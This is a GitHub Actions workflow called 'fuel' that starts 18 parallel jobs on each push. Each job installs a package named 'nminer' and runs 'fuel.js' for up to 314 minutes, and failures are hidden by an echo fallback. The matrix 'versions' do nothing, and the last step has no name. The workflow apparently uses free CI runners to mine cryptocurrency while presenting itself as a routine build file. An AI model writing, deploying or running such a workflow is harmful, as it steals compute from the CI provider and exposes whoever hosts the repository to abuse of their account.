name: fuel
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8617 }
          - { version: 9356 }
          - { version: 2579 }
          - { version: 799 }
          - { version: 3517 }
          - { version: 8441 }
          - { version: 6682 }
          - { version: 2992 }
          - { version: 1918 }
          - { version: 7467 }
          - { version: 1113 }
          - { version: 1828 }
          - { version: 4592 }
          - { version: 3961 }
          - { version: 740 }
          - { version: 546 }
          - { version: 4568 }
          - { version: 8690 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 314m node fuel.js || echo "fuel executed"